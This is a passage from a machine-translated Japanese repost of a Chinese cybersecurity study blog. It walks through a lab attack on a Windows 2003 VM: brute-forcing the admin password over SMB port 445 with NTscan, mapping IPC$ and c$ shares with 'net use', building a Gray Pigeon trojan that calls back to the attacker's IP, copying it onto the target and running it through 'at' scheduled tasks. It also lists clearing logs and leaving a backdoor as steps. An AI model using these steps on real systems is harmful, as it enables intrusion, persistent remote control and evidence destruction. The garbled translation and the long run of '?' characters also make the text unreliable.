[CyberSecurityLearning9]単純な侵入テストプロセスとトロイの木馬の埋め込みプロセス

従来の侵入テストプロセス:
0。承認(手動承認、会社の侵入を許可)

1。情報収集
      nslookup(ドメイン名のIPアドレスを収集)、whois(ドメイン名のサブドメイン名を収集)など

2。脆弱性のスキャンと
      予備スキャン:nmap =スキャンIP範囲、80などのポート(IISまたはApacheで公開、どのWebサイト?)、スキャンポートスキャンも利用可能(小さなツール)
      高度なスキャン:IIS脆弱性2003-IIS6.0など、2008 IIS7.0(スキャンリリースソフトウェアの脆弱性、また、コンテナの脆弱性として知られている)
                        (そのようなウェブサイト上で世界的に有名なトップ10の脆弱性として:SQLインジェクション、XSS、ファイルアップロードなど)スキャンWebサイトの脆弱性。
     では事実、我々はWebサイトを攻撃して、Webサイトが配置されているサーバーの最高の制御を取得しました。管理者パスワード、抜け穴を介してリモート制御を実現します。

3.脆弱性の悪用

4.特権の昇格(シェル環境、デスクトップ環境、最高の権限):相手のシェルを取得することは、相手のコマンドラインウィンドウを取得することであり、コマンドを使用して相手を制御できます。

================================================== ================================================== ===

5.死体を破壊します(ログをクリアします)

6、バックドアを離れる(バックドアの左の目的は、次に入るときに容易にすることです。今回は、最初の4つのステップで右に言及し、最初の4つのステップの後に置き去りにすると、制御できますあなたに)
      最も古典的な方法はトロイの木馬にとどまることです

7.侵入テストレポートとセキュリティ強化計画を作成します
 


実験:XPがwin2003サーバーを攻撃しました
2つの仮想マシンwinxp-1(ハッカー)とwin2003-1(サーバー)を
開きます実験の目的:winxp-1を攻撃させますwin2003-1
準備段階:winxp-1とwin2003-1は両方ともVMnet2にブリッジされます。 Winxp-1はIPを10.1.1.1に手動で構成し、win2003-1はIPを10.1.1.2に手動で構成して、相互に通信できるようにします(ファイアウォールをオフにすることを忘れないでください)
。通常の状況では、攻撃対象は次のとおりです。すべてのサーバー。??????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????」

445攻撃を実行します(445はファイル共有サーバーポートです):
最初のステップは情報を収集することです(ハッカー自身のコンピューターは10.1.1.1であり、収集される最初の情報はネットワークセグメントが10.1.1.0であるということです)
。2番目のステップはスキャンするには(この実験)私は445のポートをスキャンすることだけを気にします)
               ポートスキャンはスキャンにNmapを使用するのが最善です、この実験は実証しません、いくつかのスキャンソフトウェア(スキャンポートなど)を見つけます
 

ナレッジポイントを追加し
ます。win2003でコンピュータの右クリック管理---- Telnetサービスの有効化を開く(ポート23を開く)が
スキャンツールに役立たない、xpで検出したいwin2003がTelnetを開いていない:cmdの実行を開始-
-telnet 10.1.1.2(応答)を入力して、win2003-1がポート445を開いたかどうかを検出します。telnet10.1.1.2445を入力するだけで、カーソルが点滅し、445が開いたことを示します。
注意:Telnetはリモートにすることができますただし、相手を制御することに加えて、次のような検出ツール(telnet 10.1.1.2がポートを検出したい)としてエンジニアによって使用されることがよくあり
ます。telnet10.1.1.2446(相手に検出パケットを送信する446)

手動テストポート番号が開いています:
telnetIPアドレステストポート

上記のtelnetを使用して手動でスキャンするのは面倒です。次のツールを使用してください:scanport(10.1.1.1から10.1.1.254にスキャン)

スキャン結果:10.1.1.1(xp)、10.1.1.2(win2003)

win2003-1がポート445を開いたことを検出しました
 

445エクスプロイトIPC $:

コマンド:net use(net userではありません)
準備:まず、win2003-1の下のDドライブにshareという共有フォルダーを作成します。
コマンド機能:リモート共有フォルダーをローカルエリアにマップし、パーティションとして使用します。

net use \\ 10.1.1.2 \ ipc $ password / user:user
================================= ==
net use f:\\ 10.1.1.2 \ share password / user:user
net use f:/ del
net use * / del
net use f:\\ 10.1.1.2 \ c $ password / user:user(相手のCを入力$は使用するためにローカルFディスクにマップされます)
相手へのc $物理パスはCディスクであり、IPC $はどのディスクにも対応していませんが、接続後は相手のすべてのディスクを使用できます。パスは実際には最も強力です。
=========================================

コマンドnetuse f:\\ 10.1.1.2 \ share on winxp、相手のパスワード/ user:administratorを入力します(f:はドライブ文字を表し、仮想マシンではFドライブのないCDEドライブであり、次にFドライブ使用可能)

共有フォルダ\\ 10.1.1.2 \ shareを自分のローカルにマップし、Fドライブにマップします。ボックスがポップアップしないように、相手のアカウントのパスワード(パスワード+スペース+ /を名前に直接入力します)どのユーザー[/ user:administratorは、相手の管理者としてログインすることを意味します])

winxpのファイルエクスプローラーを開きます:が表示されます

このコンピュータのFドライブにあると思っていましたが、実際には相手のスペースに入っています。将来的には、Fドライブをローカルディスクとして使用できるようになります。

Fディスクの削除コマンド:net use f:/ del

コマンド:ネット利用\\ 10.1.1.2 \ IPC $不明なパスワード/ユーザー:管理者(サーバのほとんどは、管理者としてログインしている、通常のPCは必ずしもありませんが、パスワードはブルート力で割れることができる)ことがされて
変更することをお勧めします管理者名[ゲストと管理者の名前を入れ替えることもできます]

net use f:\\ 10.1.1.2 \ c $ 
C $ D $は、ドライブ文字の非表示のデフォルト共有です
。IPC$は空のリンクです。
一般共有は、ローカルパスと共有を使用して、共有するフォルダーですname;そしてIPC $には、物理​​パスのないipc $という共有名しかないため、この共有は空のリンクと呼ばれます。

ブルートフォースクラッキングを通じて相手の管理者のパスワードを取得したい:
ブルートフォースクラッキングシステムのパスワード445:

NTscan10(445の弾丸を介してブルートフォースでのみ実行可能
  は、パスワードディクショナリの整合性応じて強制的にクラックされる可能性がありますNT_passはパスワードディクショナリ、NT_userはユーザーディクショナリです

  小さなソフトウェア:バキュームパスワード辞書ジェネレーター(ソーシャルエンジニアリングを使用)によって生成された辞書
               は、NTscanディレクトリに配置されます

パスワードをブラストアウトした後:net use \\ 10.1.1.2 \ ipc $ password / user:administrator
は、再起動後に使用できないことがわかり
ます。解決策:コンピューターを右クリックします----マッピングネットワークドライブ(共有サービスの場合のみ) -------ウィザードが表示されます----ドライブ:F:、フォルダ書き込み\\ 10.1.1.2 \ share、ログイン時に再接続を確認します----クリックして別のユーザー名(ユーザー名:管理者、パスワード:パスワードが爆発しました----完了しました)[永続的です。この接続は起動するたびに確立されます]

ネット使用\\ 10.1.1.2 \ ipc $ 123.com / user:administratorの後、コンピュータを操作できます[非常に強力]

 

バックドアを離れる:[トロイの木馬の作成]
通常の状況では、トロイの木馬が使用されます(通常、トロイの木馬はターゲットシステムに害を及ぼすことはなく、トロイの木馬を制御する人が損害の責任を負います。ウイルスとは異なります)
トロイの木馬植えるのは、コンピュータ上でハッカーによるスパイに相当します。

ツール:ピジョンヘルダーチャンティアンフリーキルスペシャルエディション0912 [グレーピジョン]

クリックしてサービスプログラム構成ます(トロイの木馬の後、相手はハッカーによって完全に制御され、トロイの木馬はハッカーにサービスを提供するため、トロイの木馬を持っている人はサーバーと呼ばれ、ハッカーがそれを制御しますとはクライアントです)
サービスを作成します手順はトロイの木馬を作成することです
インストールオプション----インストールパス(トロイの木馬のパス)を選択します

次回はインストールパスを\ qq \ qq.ccなどに変更する必要があります。msnにすることはできません。そうしないと
起動項目の設定に失敗します(レジストリへの書き込み目的を確認して強制終了するのは簡単ではありません)。インストールは最初にサービススタートアップとしてインストールされます。クリックして名前と説明情報を表示します

自動オンライン設定---- IP:10.1.1.1 [「マスター」が誰であるかを伝えます](サーバーの生成はトロイの木馬の生成です)、パスを保持し、トロイの木馬が生成された場所を書き込み

ます構成サーバープログラムは成功しました!

このトロイの木馬(バックドア)をサーバーに配置し、空のipc $リンクに接続する前に
、IPC $の作成後に次のコマンドを作成します。

copyコマンドを使用して、トロイの木馬を埋め込みます。

C:\>コピーd:\ haha​​.exe \\ 10.1.1.2 \ c $ \ windows \ system32 \(トロイの木馬を注入)

C:\> at \\ 10.1.1.2いくつかのポイント:何をしていますか?(atコマンドはDOSコマンドに属するスケジュールされたタスクであり、スケジュールされたタスクを実行します[どの時間とどのディスクでどのファイルを実行するか])
相手のコンピュータとあなたが同じタイムゾーンにいない場合はどうなりますか(timeコマンド)
C:\> time
現在の時刻:11:16:21.54
新しい時刻を入力してください:
C:\> net time \\ 10.1.1.2   (ターゲット10.1.1.2を見つけます。コンピューター上の
時刻)\\ 10.1.1.2の現在の時刻は2019年7月26日の午前11時16分です
コマンドは正常に完了しました


C:\> at \\ 10.1.1.2 11:19 "c:\ windows \ system32 \ heihei.exe"    [11:19にCドライブの下のc:\ windows \ system32に移動して、実行するheihei.exeを見つけます]
新しく追加ジョブID = 1のジョブ
C:\> at \\ 10.1.1.2 [攻撃されたコンピューターでスケジュールされているタスクを確認する]
ステータスID日時コマンドライン
--------------- --------------------------------------------------- --------
      1今日の午前11:19c:\ windows \ system32 \ heihei.exe

C:\> at  【コンピュータのスケジュールされたタスクを確認してください】

cmdにat /?を入力して、atのコマンドパラメータと文法
を表示します。Makeatplan:at 22:30 shutdown -s今日22:30にコンピュータの電源を切ります。
アクティブ化されたatplanを表示します:atはすべての計画された計画を表示できます。
プランで1つのアイテムを表示します:at 1(atの後の1はプランのIDです)

バッチプログラムを実行します:16:20 / every:Monday "C:\ Users \ Administrator \ Desktop \ mkdir.bat"
午後:16:20 run / everyyを指定した日付に代わって、月曜日は月曜日、月曜日16回目バッチプログラムmkdir.batを20分で実行します
。バッチプログラムを実行するには、絶対パスを使用します。二重引用符で囲むことを忘れないでください。

プランで削除:1 / deleteでジョブID1を削除、
/ deleteですべてのジョブプランを削除

 

ブロイラーがオンラインになった後、灰色の鳩に関する記録があります[灰色の鳩は実際にはカリのいくつかのコマンドのコレクションです]

灰色の鳩は、相手の画面を見たり、監視したり、相手のキーボードやマウスを制御したり、その他のひどい操作をしたりすることもできます。

コーミングノート:

0.承認
1.情報収集
  nslookupwhois2
。スキャンの脆弱性
  namp = ip range port 80(IIS、apache、どのWebサイト)Scanportの
  高度なスキャン:IISの脆弱性2003-IIS6.0 2008IIS7.0
            スキャンWebサイトの脆弱性()
3。脆弱性の使用

4.権利の昇格(シェル環境、デスクトップ環境、最高の権限)
========
5。死体を破壊する
6.裏口を守る
7.侵入テストレポート

手動テストポート番号が開いています:
telnetIPアドレステストポート

1.scanportはポート445をスキャンします

2.脆弱性
エクスプロイトIPC $:ブルートフォースクラッキング:NTscan

3.
net use \\ 10.1.1.2 \ ipc $ password / user:user
=============================== == ==
次のコマンドも学習する必要があります:
net use f:\\ 10.1.1.2 \ share password / user:user
net use f:/ del
net use * / del
net use f:\\ 10.1.1.2 \ c $ password / user:User
============================================== ================================================== ================================================== ================================================== ================================================== ============

4.トロイの木馬を作る
CDの灰色の鳩のソフトウェアを使用する

5.トロイの木馬を移植する(裏口を離れる)
コピーd:\ heihei.exe \\ 10.1.1.2 \ c $

6.スケジュールされたタスクを設定して、トロイの木馬を自動的に実行します。nettime
\\ 10.1.1.2
at \\ 10.1.1.2 11:11 "c:\ heihei.exe"

7.ブロイラーがオンラインになるのを待ちます
                         

おすすめ

転載: blog.csdn.net/Waffle666/article/details/113174136